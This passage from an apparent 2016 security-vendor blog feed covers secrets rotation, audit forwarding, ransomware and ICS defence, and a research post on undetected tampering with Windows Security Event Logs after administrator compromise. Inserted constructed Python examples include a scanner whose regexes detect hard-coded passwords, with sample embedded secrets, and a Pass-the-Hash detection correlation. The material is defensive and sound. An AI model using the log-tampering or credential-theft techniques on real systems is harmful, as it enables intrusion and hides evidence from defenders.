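    {"id": "db/prod/password",
     "annotations": {"rotation/rotator": "postgresql/password", "rotation/ttl": "PT12H"},
     "last_rotated": datetime(2016, 6, 13, 1, 0)},
    {"id": "aws/region", "annotations": {}, "last_rotated": None},  # static config, not rotated
]


def rotation_status(variables, now):
    """For each variable: is it under rotation management, and if so is it overdue and by how much."""
    report = []
    for v in variables:
        ttl = v["annotations"].get("rotation/ttl")
        if not ttl:
            report.append({"id": v["id"], "managed": False, "overdue": False, "overdue_by": None})
            continue
        due = v["last_rotated"] + parse_iso_duration(ttl)
        late = now - due
        report.append({"id": v["id"], "managed": True,
                       "overdue": late > timedelta(0),
                       "overdue_by": late if late > timedelta(0) else None})
    return report


def overdue_ids(variables, now):
    return [r["id"] for r in rotation_status(variables, now) if r["overdue"]]


if __name__ == "__main__":
    for row in rotation_status(VARIABLES, datetime(2016, 6, 13, 12, 0)):
        print(row)
```

A variable that is under management but overdue is the case to alert on: either the rotator failed (the press release below notes Conjur alerts on rotation failures) or the underlying system rejected the new credential, and either way the old secret is still live past its intended lifetime.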


LDAP Sync in the Conjur UI

LDAP Sync imports corporate Active Directory or POSIX LDAP structure into the Conjur environment. When users are added to or removed from AD/LDAP, these changes are reflected automatically in Conjur. AD/LDAP serves as the system of record for users and groups, while Conjur is the master source of machine identity, privileges and secrets.

LDAP Sync in Conjur UI

LDAP Sync can now be configured and triggered in the Conjur UI. A connection to an existing LDAP/AD system can be established and saved in the Conjur UI for later use. Users and groups can be filtered so that only the entities you want are synced to Conjur. Additionally, public keys can be synced as well. This makes it easy to start governing SSH access with Conjur.

Read more about LDAP Sync on our developer site.


Forwarding audit events to external systems like Splunk and ELK

Conjur’s audit log contains events detailing everything that happens in the Conjur environment. The Conjur audit log tells a complete audit and compliance story. Shipping audit events to a centralized logging platform (Splunk, ELK, etc.) is a new capability in Conjur v4.7.0. This allows you to use your existing log management systems to inspect, and alert on, events happening in Conjur.

Conjur audit event in Splunk

Conjur 4.7 exposes a logrotated JSON file `audit.messages` that can be forwarded to any log aggregation platform. Since the logs are JSON, fields are parsed on ingestion and easily searchable. Alerts and notifications can then be triggered on events in Conjur. For example, an alert can be sent to your InfoSec team if a user is repeatedly denied `sudo` access on a host. A second example: a notification can be sent to a Slack room on policy updates, increasing the visibility into how your organization’s security policy changes over time.

Read more about audit forwarding on our developer site.
Also, see our Splunk integration page for an illustrated example.
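The two alert ideas above (repeated `sudo` denials on a host, and notifications on policy updates) are simple enough to show end to end. The following added example (not Conjur code, and not an illustration of the actual `audit.messages` schema) consumes constructed JSON lines in an assumed shape with fields `timestamp`, `action`, `user`, `resource`, `privilege` and `allowed`, skips malformed lines the way a log shipper must at rotation boundaries, raises one alert per user/host pair that accumulates three denied sudo checks within five minutes, and emits a notification for every policy update. Map the real audit fields onto these names when building the equivalent Splunk or ELK rule.

```python
"""Route Conjur-style JSON audit events to alerts and notifications.

Added example, not Conjur's code. The event field names are assumed for
illustration and AUDIT_LINES is constructed, including one deliberately
corrupt line.
"""
import json
from collections import defaultdict
from datetime import datetime

AUDIT_LINES = """
{"timestamp": "2016-06-13T10:00:01Z", "action": "check", "user": "user:alice", "resource": "host:prod/web01", "privilege": "sudo", "allowed": false}
{"timestamp": "2016-06-13T10:00:20Z", "action": "check", "user": "user:alice", "resource": "host:prod/web01", "privilege": "sudo", "allowed": false}
{"timestamp": "2016-06-13T10:00:45Z", "action": "check", "user": "user:alice", "resource": "host:prod/web01", "privilege": "sudo", "allowed": false}
{"timestamp": "2016-06-13T10:01:05Z", "action": "check", "user": "user:bob", "resource": "host:prod/web01", "privilege": "sudo", "allowed": true}
{"timestamp": "2016-06-13T10:02:00Z", "action": "check", "user": "user:carol", "resource": "host:prod/db01", "privilege": "sudo", "allowed": false}
{"timestamp": "2016-06-13T10:30:00Z", "action": "update", "user": "user:bob", "resource": "policy:prod/web", "privilege": null, "allowed": true}
this line is not json and must be skipped, not crash the pipeline
""".strip()


def parse_audit(text):
    """Parse JSON lines, dropping unparseable ones (partial writes at logrotate time are normal)."""
    events = []
    for line in text.splitlines():
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def _ts(event):
    return datetime.fromisoformat(event["timestamp"].replace("Z", "+00:00"))


def sudo_denial_alerts(events, threshold=3, window_seconds=300):
    """One alert per (user, host) with `threshold` denied sudo checks inside the window."""
    denials = defaultdict(list)
    for e in events:
        if e.get("action") == "check" and e.get("privilege") == "sudo" and e.get("allowed") is False:
            denials[(e["user"], e["resource"])].append(_ts(e))
    alerts = []
    for (user, host), times in denials.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window_seconds:
                alerts.append({"user": user, "host": host, "denials": threshold,
                               "since": times[i].isoformat()})
                break
    return alerts


def policy_change_notifications(events):
    """A human-readable line per policy update, e.g. for a Slack webhook."""
    return [f"{e['user']} updated {e['resource']} at {e['timestamp']}"
            for e in events
            if e.get("action") == "update" and str(e.get("resource", "")).startswith("policy:")]


if __name__ == "__main__":
    evts = parse_audit(AUDIT_LINES)
    print(sudo_denial_alerts(evts))
    print(policy_change_notifications(evts))
```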


See the release notes for Conjur 4.7 for a full list of all changes in this new release.

Contact us for release access and upgrade instructions, or if you have any questions. We hope you enjoy this new release of Conjur!


]]>
Conjur Automates Secrets Rotation at Web-Scale https://www.cyberark.com/blog/conjur-automates-secrets-rotation-at-web-scale/ Wed, 08 Jun 2016 17:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-automates-secrets-rotation-at-web-scale/  

Press Release:

New privileged access management functionality takes the risk and guesswork out of compliance

WALTHAM, Mass. – June 8, 2016 – Conjur, Inc., the digital business security software provider, today announced the availability of Secrets Rotation, Automation and Monitoring, providing clients with fully automated secrets management.

“Secrets” are credentials such as passwords and API keys that provide privileged access to IT systems. Secrets need to be changed, or “rotated” periodically, sometimes daily, in order to help prevent unauthorized access to systems.

Incorporated into the Conjur privileged access management software, Secrets Rotation, Automation and Monitoring offloads the secrets management burden from DevOps and software developers, and provides companies with a clear view into compliance with secrets rotation policies. Clients can simply log in to their Conjur dashboard to view the rotations and schedule and rotate on demand.

“Secrets management is a security best practice that absolutely requires automation given the scale and complexity of today’s digital business systems,” said Elizabeth Lawler, CEO of Conjur. “Without clear insights into when secrets are rotating, and confirmation that rotations have occurred without failure, it’s virtually impossible to confirm that you’re compliant – and that your information is safe.”

Secrets management is a critical aspect of security, but current solutions lack clear visibility into rotation history. Conjur alerts to rotation failures, and the intuitive user interface design makes it simple for clients to produce an audit trail to demonstrate compliance.

Secrets rotation is an element of security best practices, but managing it can be expensive when you’re talking about digital business systems composed of thousands of interconnected cloud instances, microservices, databases, and other system entities. With policy-driven automation of secrets rotation, a simple dashboard and clear insights into secrets management, Conjur is taking the risk and guesswork out of compliance, allowing clients to focus on delivering the best user experience to customers, rather than system administration and worrying about digging through data to produce proof of compliance.

Secrets Rotation, Automation and Monitoring is currently available to Conjur clients and integrates to secure a wide variety of legacy and cloud resources.

About Conjur

Conjur is privileged access management and security software for digital businesses, who need to secure access to the thousands of system resources that compose modern applications. For enterprises that need to protect their infrastructure and ensure audit compliance and traceability, Conjur is the only solution with comprehensive identity and authorization for every cloud, VM, container, service, job and user. Conjur helps companies such as Netflix, Box, and Cisco solve critical operational, compliance, and security challenges that originate in modern automated infrastructure. Headquartered in Waltham, Massachusetts, Conjur is funded by Avalon Partners and Amplify Partners. Visit www.conjur.net and follow @conjurinc on Twitter.

PR Contact:
Andy Ellicott
Conjur, Inc.
+1-603 205 2804

andy@conjur.net

All trademarks recognized.


]]>
Combatting the Threat of Enterprise Ransomware https://www.cyberark.com/blog/combatting-the-threat-of-enterprise-ransomware/ Tue, 07 Jun 2016 09:21:37 +0000 https://www.cyberark.com/blog//

Ransomware has been around for decades, but it’s quickly gaining popularity among attackers. In 2015, the FBI received 2,453 complaints about ransomware, costing victims more than $24 million – and those are only the cases that were reported. Those numbers have the potential to rise significantly in 2016.

CISOs and other senior IT security executives are under pressure to combat the threat of ransomware, not only because of the fear of becoming another headline, but also because ransomware has demonstrated the ability to take control over a business.

Ransomware is particularly daunting for a few reasons:

  • Administrator rights are not always required. So, while privilege management can play a role in mitigating risks, many strains of ransomware can encrypt data using standard user rights, so even if an organization has removed local administrator rights, this doesn’t necessarily mitigate the risk.
  • There is immediate impact to business productivity. Ransomware has a devastating and immediate impact because it can encrypt (and render unreadable) all files that a user has access to in a corporate environment.

There are a number of techniques organizations can use to mitigate the risk of ransomware attacks including regular backups, anti-malware, privilege management and application control/whitelisting. At CyberArk, we have helped many organizations employ a combination of application control and least privilege enforcement to protect against advanced malware attacks. These capabilities are designed and proven to protect organizations from ransomware attacks, a specific form of malware.

To prove the efficacy of the solution, the CyberArk Labs team has manually tested 450 specific ransomware samples from 14 different crypto families (including Cryptolocker, Petya, and Locky) – focusing on the most common and notorious ransomware strains. CyberArk Viewfinity is able to block 100% of the ransomware samples from successfully encrypting files.

Most anti-malware and anti-ransomware solutions today focus on detecting and blocking malware at the point of inception. These solutions can be helpful when you know what you’re looking for – but when it comes to ransomware, there are new variants coming out every day. It’s challenging to stay ahead of the attackers and block all variations of ransomware from entering a network.

CyberArk Viewfinity takes another approach – protecting the sensitive files in an organization from the damage that often results from ransomware attacks. Employing greylisting, an approach that allows unknown applications (e.g. the latest ransomware variant) to execute, the solution blocks ransomware from being able to access or encrypt files. By applying proactive protection on the actual files that ransomware is attempting to encrypt, this approach can render ransomware incapable of causing damage.

The CyberArk Viewfinity approach is signature-less and protects against known and unknown variants of ransomware. By applying a protective layer of security around the target of malicious applications, the challenging task of detecting polymorphic malware is no longer the only strategy.

For an explanation of how ransomware works, check out a previous blog post that examines a recent attack targeting three Indian banks and a pharmaceutical company, resulting in millions of dollars in damage.

Editor’s Note: CyberArk Viewfinity with enhanced protection is now CyberArk Endpoint Privilege Manager.

]]>
Mitigate Cyber Threats in Industrial Control Systems with Application Whitelisting https://www.cyberark.com/blog/mitigate-cyber-threats-in-industrial-control-systems-with-application-whitelisting/ Tue, 07 Jun 2016 09:02:48 +0000 https://www.cyberark.com/blog//

The number of security incidents reported by organizations that operate Industrial Control Systems (ICS) has increased in recent years. Some of these incidents have impacted the operation of critical infrastructure. In a recent survey about cybersecurity and critical infrastructure, respondents indicated that 76% of attacks have grown in sophistication compared to previous years.

The use of malware (Dragonfly, Black Energy, Irongate etc.) to infiltrate organizations and compromise assets in ICS is a driving force in the increasing number of attacks. To mitigate the spread of malware, there are many security practices that industrial organizations should consider. One example is application whitelisting. This practice has been recommended by industry organizations, ICS security experts and government agencies to help mitigate the spread of malware into ICS environments. Application whitelisting enables organizations to:

  • Lock down specific ICS nodes allowing only approved files to run
  • Mitigate/contain the spread of malware to industrial control system assets
  • Enable users to seamlessly run whitelisted applications in critical systems

Another factor contributing to the increasing number of attacks is the interconnection between IT systems and the OT environment. The level of risk is increasing because ICS is now exposed to the Internet. The stakes are high for industrial organizations because a security breach can go well beyond data exfiltration. A security incident could disrupt operations and cause damage to personnel, property and the environment.

Organizations seek new ways to effectively and efficiently operate their industrial control systems in order to lower costs and mitigate potential security risks. Here are some practices to keep in mind when sourcing application whitelisting solutions for ICS:

  • Collaborate with solution providers and ICS vendors to baseline and calibrate application whitelisting solutions to mitigate technology interoperability issues and deploy the most reliable solution possible.
  • Consider a solution provider with a strong support organization and training program. This can help industrial organizations to mitigate a talent gap by helping them transfer and strengthen knowledge of ICS operations and security.
  • Investigate the ability to adopt a whitelisting “solution as a service”. This approach could help organizations to acquire the technology and expertise to support the cyber security requirements without forcing the undertaking of this project internally.

The infographic below illustrates the increase in frequency and sophistication of attacks, the connection to privileged accounts as a common denominator and important mitigation steps to help industrial organizations in the path to increase their security posture.

Read more about CyberArk’s new cyber security capabilities for Industrial Control Systems.

[Infographic: Cyber threats to ICS]

The Value of CISO Peer-to-Peer Guidance https://www.cyberark.com/blog/value-ciso-peer-peer-guidance/ Wed, 01 Jun 2016 13:28:05 +0000 https://www.cyberark.com/blog//

Today, enterprise organizations worldwide face a growing range of cyber security threats. From speaking with a number of leading CISOs, we know many view their peers as valuable and important resources in the fight against cyber attacks because they have challenges and adversaries in common.

In a CIO article, Jim Motes, contributor to our CISO View research report, advocates for stronger collaboration among information security leaders to help stem the current cyber security talent shortage while better protecting corporate networks. Many CISOs we speak to believe that sharing experience, observations, predictions and solutions with peers is absolutely critical. This is often easier said than done in a world of overbooked schedules.

This is why CISOs have responded positively to the report, “The Balancing Act: The CISO View on Improving Privileged Access Controls,” commenting the report is like “getting a bunch of ace CISOs together and picking their brains – all without ever leaving the office.”

The research addresses the elements that facilitate security initiatives – details based on the hard-won experiences of security professionals. Your organization is not alone in its challenges; even the best-managed organizations have a range of issues to address, including cultural resistance to change. This group of change-agent CISOs has made things happen even when the realities of legacy systems, processes and personalities were messy. By learning from their experiences, you can too.

I’ve been impressed by how candid the contributing team of CISOs has been. It’s my hope that their pragmatic, real-world stories will help you plan and hone your security programs. I encourage you to download and read the full report. But in the meantime, here is more food for thought:

  • Improving privileged access controls is a balancing act between restricting and enabling access. There are options available for an effective strategy.
  • A team with the right blend of hard and soft skills is a key ingredient in improving privileged access controls. Influencing and educating people is a critical job, and to do that, the security team needs to rely on members who are good with both technology and with people.
  • Metrics are essential for evaluating the need for improvements, and then later, measuring the effectiveness of controls and the impact on the business. The report provides specific recommendations on what metrics to gather and how to best use them.

We are proud to support the CISO View initiative and are grateful to the group of CISOs who made this initiative possible. By sharing their insights, the members of the panel are helping the larger community improve privileged access controls.

Privileged Account Security: The Foundation of an Enterprise Security Strategy https://www.cyberark.com/blog/privileged-account-security-foundation-enterprise-security-strategy/ Fri, 27 May 2016 17:44:11 +0000 https://www.cyberark.com/blog//

The most recent Verizon DBIR confirmed, yet again, that privileged account security is an essential part of an organization’s defense – protecting networks and data from cyber attacks and cyber criminals.

Over 100,000 security incidents and 2,260 confirmed breaches were analyzed to compile this year’s Data Breach Investigations Report (DBIR), which for the first time includes a separate section on credentials – a telltale sign of the increasing importance of Privileged Account Security.

According to the DBIR, approximately 80% of data breaches are executed by external actors, and the predominant motive for the attacks is financial gain. One of the most notable findings is that compromising a network takes less than an hour in 93% of cases.

“As previously alluded to, these cases begin with a phish, featuring an attachment whose mission in its malware life is to steal credentials. If you have legit creds, it doesn’t take a very long time to unlock the door, walk in and help yourself to what’s in the fridge.”

Once in, credentials represent the top data variety that attackers seek. This is mostly due to the large amount of opportunistic banking Trojans and the desire to acquire intellectual property.

Within the credentials section, Verizon reports that 63% of confirmed data breaches involved weak, default or stolen passwords. Looking at incident classification patterns – recurring combinations of who (Actors), what (assets), how (actions) and why (motive), among other incident characteristics – privilege misuse was the second most common reason for a credential attack.

Even more alarming, in Point of Sale attacks, “Ninety-seven percent of breaches featuring use of stolen credentials also had a vector of Partner. This is selected when the Actor uses legitimate partner access in the hacking action.”

In incidents of cyber espionage, the second most prevalent threat action is the use of malware. Specifically, malicious software was involved in 90% of cyber-espionage incidents. The report goes on to mention that whether it’s delivered via email, a web drive-by, or direct/remote installation, protecting the endpoint is critical to thwart malware attacks.

Achieving Privileged Account Security

In a recent presentation, Rob Joyce, Chief of Tailored Access Operations at the NSA, remarked that the privileged credentials of network administrators and other privileged users are sought after by persistent threat actors as a means of gaining access to critical systems. Privileged credentials are, in fact, absolutely critical for this purpose and, ultimately, for reaching the heart of the enterprise.

As recommended by Mr. Joyce, privileged account security must be a strategic priority for an organization. It’s imperative for organizations to understand what normal privileged user behavior is and what isn’t. Effective protection requires implementing a robust and dynamic password policy that includes enforcing a policy of “least privilege” so that users have only the privileges required to do their job. Finally, the increase in phishing attacks underscores the need for organizations to raise cyber security awareness to mitigate this type of attack.

Here are some important practices to keep in mind around privileged account security:

  • Understand what your privileged users do across your network; their credentials are a target that must be secured.
  • Implement least privilege and application whitelisting as a means to stop malware from spreading.
  • Do not lose sight of applications which may have hard-coded credentials built into scripts. These could expose hashes that compromise your most critical assets, such as domain controllers.
  • Understand anomalous behavior and how to stop it before it takes over your networks.
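
The third practice above, hard-coded credentials in scripts, is the one that is easiest to check for mechanically. The following scanner is an added example written for this post, not a CyberArk tool: it runs a few detection patterns over a constructed backup script and reports the lines that embed a secret, while ignoring references to environment variables or vault-injected values (the patterns, the placeholder rule and the sample script are all assumptions made for the example).

```python
"""Added example: flag hard-coded credentials in scripts before they ship.

Illustrative code written for this post, not a CyberArk tool. The sample
script and the detection patterns are constructed assumptions; a real scan
would tune the patterns to the organization's own naming conventions.
"""
import re
from typing import List, Tuple

# Patterns that commonly betray an embedded secret in shell, PowerShell or
# Python scripts. The capturing group, where present, is the secret value.
SECRET_PATTERNS = [
    (re.compile(r"(?i)(?:passw(?:or)?d|pwd|secret|api[_-]?key|token)\s*[:=]\s*['\"]?([^'\"\s]{4,})"),
     "credential assignment"),
    (re.compile(r"(?i)--password(?:=|\s+)['\"]?([^'\"\s]+)"), "password on command line"),
    (re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"), "embedded private key"),
    (re.compile(r"\b\w+://[^/\s:@]+:[^@\s]+@"), "credential in URL"),
]

# Values that reference an environment variable, a vault placeholder or an
# obvious dummy are not findings: the secret itself is not in the file.
PLACEHOLDER = re.compile(
    r"(?i)^(?:<[^>]+>|\$\{?[A-Za-z_][A-Za-z0-9_]*\}?|%[A-Za-z_]+%|\*{3,}|changeme|example)$")

# Constructed sample: a backup script of the kind found on many jump hosts.
SAMPLE_SCRIPT = """#!/bin/bash
# Nightly database backup (constructed sample for this example)
DB_HOST=db01.internal
DB_USER=backup_svc
DB_PASSWORD="Winter2016!"            # secret baked into the script
psql --password="Winter2016!" -h $DB_HOST -U $DB_USER -c 'select 1'
ADMIN_TOKEN=${VAULT_ADMIN_TOKEN}       # injected at run time, not a finding
curl https://svc:S3cret@repo.internal/artifact.tgz -o artifact.tgz
"""


def scan_script(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, finding_type, line) for every suspicious line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if stripped.startswith(("#", "//", "REM ")):
            continue  # whole-line comments are skipped
        for pattern, kind in SECRET_PATTERNS:
            m = pattern.search(line)
            if not m:
                continue
            value = m.group(m.lastindex) if m.lastindex else ""
            if value and PLACEHOLDER.match(value):
                continue  # another pattern may still fire on this line
            findings.append((lineno, kind, stripped))
            break  # one finding per line is enough
    return findings


if __name__ == "__main__":
    for lineno, kind, line in scan_script(SAMPLE_SCRIPT):
        print(f"line {lineno}: {kind}: {line}")
```

Run as a pre-commit hook or over a scripts share, a scanner like this turns the bullet point into a measurable control: every hit is either a secret to move into the vault or a false positive to tune out.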

The importance for organizations to proactively secure privileged accounts is no secret. Privileged Account Security is not only essential in defending networks and data from cyber attacks and cyber criminals but also in building an effective and proactive cyber security posture that can stand up to the most aggressive of attacks.

Integrate CyberArk with a SIEM Solution, Gain Valuable Insights About Advanced Threats https://www.cyberark.com/blog/integrate-cyberark-siem-solution-gain-valuable-insights-advanced-threats/ Tue, 24 May 2016 08:58:04 +0000 https://www.cyberark.com/blog//

Reviewing recent breaches, we consistently see the same attack patterns. Simply put, attackers crash through the perimeter, compromise a credential and then use the acquired access to move laterally throughout the network. They escalate privileges until they complete their goal. Whether the mission is to steal data, disrupt operations or destroy infrastructure, attackers tenaciously pursue their goals, using a wide variety of tools and tactics.

Ideally, organizations will break the attack lifecycle early in the cycle. In April 2016, CyberArk launched the C3 Alliance – CyberArk’s global technology partner program, to help organizations better address security challenges and to stop the most advanced cyber threats – those involving privileged accounts. By incorporating CyberArk’s privileged account security best practices, as well as leveraging CyberArk privileged account data within a rich partner ecosystem, mutual customers can maximize their existing security and IT investments to enhance their overall security posture.

For example, CyberArk integrates with leading SIEM solutions to leverage CyberArk privileged account activity data and to deliver more valuable insights about advanced threats to customers. Privileged activity alerts from CyberArk Privileged Threat Analytics are sent to the SIEM solutions, and the alerts can then be correlated with other real-time data collected from the organization, so that the most critical security threats can be identified. With these integrated solutions in place, organizations can leverage enhanced detection capabilities to break the attack lifecycle as early as possible.

Here are two scenarios to demonstrate the advantages of the integrated solutions:

  • An Unmanaged Privileged Account – CyberArk Privileged Threat Analytics integrated with a SIEM solution can detect a privileged account (user or application) that is used in the environment, and flag it if it is not managed in the vault.

By correlating login activity made by privileged accounts received from the SIEM solution with CyberArk Digital Vault data, CyberArk Privileged Threat Analytics verifies if the account is managed by the CyberArk Solution and if not, sends the alert to the SIEM solution. These unmanaged accounts may pose a risk to the customer, as they can be accessed in an uncontrolled way. As a best practice, all privileged accounts should be managed in the CyberArk Solution, especially active accounts in use.

  • Suspected Credential Theft – An attacker compromises a machine and steals privileged credentials using hash harvesting to execute a Pass-the-Hash attack. Once privileged access is obtained, the attacker tries to access a different sensitive machine. The SIEM solution, in this case, sends all login activities to CyberArk Privileged Threat Analytics, which correlates the logs from both sources, looking for a match between a login to an endpoint and a prior password retrieval from the CyberArk Solution. When CyberArk Privileged Threat Analytics detects that a user is connected to a machine with a privileged account without first retrieving the credential from the CyberArk Digital Vault, the solution can prompt an immediate credential rotation and send an alert to the SIEM that there is a suspected credential theft.
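
Both scenarios reduce to one correlation: join privileged logon events from the SIEM against the vault's record of which accounts it manages and when their credentials were retrieved. The block below is an added example written for this post, not CyberArk Privileged Threat Analytics or its integration code; it parses constructed SIEM and vault log lines, raises an "unmanaged privileged account" alert for the first scenario and a "suspected credential theft" alert for the second. The line formats, account names, hosts and the eight-hour retrieval window are assumptions made for the example.

```python
"""Added example: correlating SIEM logon events with vault retrieval records.

Illustrative code written for this post, not CyberArk Privileged Threat
Analytics. The log line formats, account names, hosts and the eight-hour
retrieval window are constructed assumptions.
"""
from datetime import datetime, timedelta
from typing import Dict, List, Set

# Accounts the vault manages, and the wider set the organization treats as
# privileged. Both sets are constructed for this example.
VAULT_MANAGED: Set[str] = {"CORP\\svc_backup", "CORP\\dbadmin"}
PRIVILEGED: Set[str] = VAULT_MANAGED | {"CORP\\legacy_admin"}

# A logon is covered by a vault retrieval if the credential was retrieved
# within this window before the logon (assumed policy value).
RETRIEVAL_WINDOW = timedelta(hours=8)

# Constructed sample input. SIEM lines carry Windows logon events (4624);
# vault lines record password retrievals from the vault.
SIEM_LINES = [
    "2016-05-24T09:05:00 EventID=4624 Account=CORP\\dbadmin Host=sql01",
    "2016-05-24T10:00:00 EventID=4624 Account=CORP\\svc_backup Host=fs02",
    "2016-05-24T11:00:00 EventID=4624 Account=CORP\\legacy_admin Host=dc01",
    "2016-05-24T12:00:00 EventID=4624 Account=CORP\\jsmith Host=ws-117",
]
VAULT_LINES = [
    "2016-05-24T09:00:00 Action=Retrieve Account=CORP\\dbadmin Requester=alice",
]


def parse_line(line: str) -> Dict[str, str]:
    """Parse 'ISO-timestamp key=value key=value ...' into a dict."""
    stamp, rest = line.split(" ", 1)
    fields = dict(tok.split("=", 1) for tok in rest.split())
    fields["when"] = stamp
    return fields


def correlate(siem_lines: List[str], vault_lines: List[str],
              window: timedelta = RETRIEVAL_WINDOW) -> List[Dict[str, str]]:
    """Return alerts for privileged logons that the vault cannot account for."""
    retrievals: Dict[str, List[datetime]] = {}
    for f in map(parse_line, vault_lines):
        if f.get("Action") == "Retrieve":
            retrievals.setdefault(f["Account"], []).append(
                datetime.fromisoformat(f["when"]))

    alerts: List[Dict[str, str]] = []
    logons = [f for f in map(parse_line, siem_lines) if f.get("EventID") == "4624"]
    for lg in sorted(logons, key=lambda f: f["when"]):
        account, when = lg["Account"], datetime.fromisoformat(lg["when"])
        if account not in PRIVILEGED:
            continue  # ordinary user logon: out of scope for this check
        if account not in VAULT_MANAGED:
            # Scenario 1: a privileged account in use that the vault does not manage.
            alerts.append({"type": "unmanaged_privileged_account", "account": account,
                           "host": lg["Host"], "when": lg["when"]})
            continue
        covered = any(when - window <= t <= when for t in retrievals.get(account, []))
        if not covered:
            # Scenario 2: a managed account logged on with no prior retrieval,
            # which is what a stolen credential (e.g. Pass-the-Hash) looks like here.
            alerts.append({"type": "suspected_credential_theft", "account": account,
                           "host": lg["Host"], "when": lg["when"]})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SIEM_LINES, VAULT_LINES):
        print(alert)
```

The interesting design choice is the direction of the join: the vault record is the source of truth, and any privileged logon it cannot explain is the anomaly. That is why the second alert can trigger a credential rotation safely, since a legitimate user would simply retrieve the new credential from the vault.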

Keep in mind, attackers will act inside a network undetected for an average of 146 days. If an organization is able to detect privileged misuse quickly, the time exposed can be significantly reduced, resulting in a corresponding reduction in damage to the business.

To learn more about how CyberArk works with leading SIEM vendors, click here or watch a short video of one of our C3 Alliance members talking about market trends and the advantages of technology integration with CyberArk.

Join us on Tuesday, May 24, 2016 for a webinar with FireEye. The webinar will focus on how attackers find their way into the heart of enterprises, the role privileged credentials (passwords and SSH keys) play in an active cyber attack, and how the integration of the CyberArk Privileged Account Security Solution and the FireEye Threat Analytics Platform (TAP) can help organizations detect, alert and rapidly respond to cyber attacks.

C³ Alliance: AccelOps & CyberArk

C³ Alliance: FireEye & CyberArk

C³ Alliance: LogRhythm & CyberArk

C³ Alliance: RSA, The Security Division of EMC & CyberArk
CyberArk Labs: Can Incident Response and Audit Teams Always Trust Windows Security Event Logs? https://www.cyberark.com/blog/cyberark-labs-can-incident-response-audit-teams-always-trust-windows-security-event-logs/ Thu, 19 May 2016 19:53:58 +0000 https://www.cyberark.com/blog//

Introduction

CyberArk Labs recently identified what it believes to be a significant risk in the Microsoft Windows 10 Security Event log.

Once reserved for IT administrators troubleshooting system problems, the Windows Event Log has evolved into an important component of enterprise security operations for conducting Windows audits and threat detection. According to Microsoft, the Event Viewer provides detailed information about system events, including the event type, the date and time the event occurred, the source of the event, the category of the event, the Event ID, the user who was logged on when the event occurred, and the computer on which the event occurred.

Automated solutions and security experts collect and analyze these Event Logs to identify security-related risks such as OS changes made using privileged administrator account credentials. Security experts have become conditioned to fully trust the reliability of this log data, and due to the perceived high reliability of the Windows Event Log, it may serve as evidence in court. But what if an attacker gains control over an endpoint, compromises privileged accounts, and manipulates these records?

This blog will explore a serious condition that risks enabling an attacker to manipulate log data, address the impact on the veracity of Event Logs and security protocols, and offer advice to organizations to help mitigate risk.

Description of Risk

Our research discovered security risks relating to Windows Security Event Logs used to support Windows Audit processes. Attackers may be able to bypass security measures and alter Event Logs that automated algorithms and security experts rely on to mitigate the damage of an attack. By circumventing Microsoft security audits and falsifying Event Logs, attackers would be able to cover their tracks, exploit privileged credentials without detection, freely move about the network and exfiltrate data or cause other damage to the infrastructure.

Automated services and security experts trust the information in Event Logs for several reasons, including that log files are only accessible by the Event Log service and the Security Event Log is only writable by the Local Security Authority Subsystem Service (LSASS) process. LSASS is the Microsoft Windows process that enforces security policy by verifying users logging on to a Windows computer or server, managing password changes and creating access tokens.

In Windows 10, new capabilities were added to LSASS to help identify attacks that steal credentials from the memory of a process. New Microsoft audit features not only track unwanted access to LSASS, but also privileged credential escalation and credential theft.

After reviewing new audit features, CyberArk Labs initiated research that found several risks associated with Windows Event Log, including:

  • Security audit files are not encrypted on the machine
  • These files are editable by attackers through multiple techniques
  • These files can be modified if an attacker has the required skills
  • Once modified, these files can be opened by Windows Event Viewer without any indication of compromise. Event Viewer is a tool that displays detailed information about significant events on your computer (for example, programs that don’t start as expected or updates that are downloaded automatically).

Exploitation

It is generally known that the security log (Security.evtx) file is only writeable by the LSASS process. According to Microsoft, “only the Local Security Authority (Lsass.exe) has write permission for the Security log. No other account can request this privilege.”

Our research team set out to investigate whether the data inside Windows Security Log could be manipulated. Our research is ongoing, but we decided it was important for security vendors and incident response teams to understand what we’ve learned so far.

During our research, the team has been able to accomplish several tasks that should raise concerns among customers. These tasks include the ability to stop the writing to the Security Event Log, alter records, replace the existing log, and resume the event log – all without being detected.

Our research proved that once the administrator privileges on the machine had been compromised, there are a number of ways to retrieve and edit the data, and then inject the modified data back into the log without detection. Specifically, the following screen shots illustrate the change of a single record in the security audit file whose purpose is to alert on access to the LSASS process. The actual event was triggered using Mimikatz.

After altering this field we can see that there are no traces to the actual incident (those trained on where to look will notice that no “Log Clear” record exists).


Figure 1 – Pre modification

Which is followed by:

Figure 2 – Post modification

As you can see, the event record that initially indicated Mimikatz performed a “read memory” action from LSASS now shows there is no threat to the enterprise.

Mitigation

There are a few mitigation techniques that organizations should consider. The first would be to ensure that audit records are immediately sent to their SIEM (log management) system. If a trusted copy of the audit record can be stored outside of the Microsoft audit log, any unauthorized changes to the log file will not impact the operation of their analytics system or centralized audit records.

However, our experience has shown that many organizations do not have a SIEM, may not collect logs from all of their systems or do not upload log entries in real-time, so this mitigation option may be of limited use. And of course, this step will have no mitigation value if an attacker disables the audit logging process for a period of time.

This attack can be avoided in the first place by adopting the least privilege principle – specifically, by denying administrative rights to endpoint users. Though altering the data does not require administrative rights, the procedure that enables an attacker to actually replace the data inside the security event log does.

Additional mitigation techniques include monitoring access to these sensitive files; monitoring administrative actions in real-time and monitoring access to sensitive processes like the event log service.

Further mitigation techniques are being specified as research into this risk continues.
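
The first mitigation above, forwarding audit records to a SIEM in real time, only helps if the collector can tell when the stream it received is no longer complete. The block below is an added example written for this post, not a CyberArk product or part of the research described here: it runs three continuity checks over constructed forwarded Security log records, flagging a gap in EventRecordID values, a period of silence longer than the host normally shows, and a record ID that goes backwards (which is what a cleared, replaced or recreated log looks like from the collector's side), alongside the documented "audit log was cleared" (1102) and "event logging service has shut down" (1100) events. The record format and the 30-minute silence threshold are assumptions made for the example.

```python
"""Added example: continuity checks on Security log records forwarded to a SIEM.

Illustrative code written for this post, not a CyberArk product. The record
format and the silence threshold are constructed assumptions. Event IDs 1102
("The audit log was cleared") and 1100 ("The event logging service has shut
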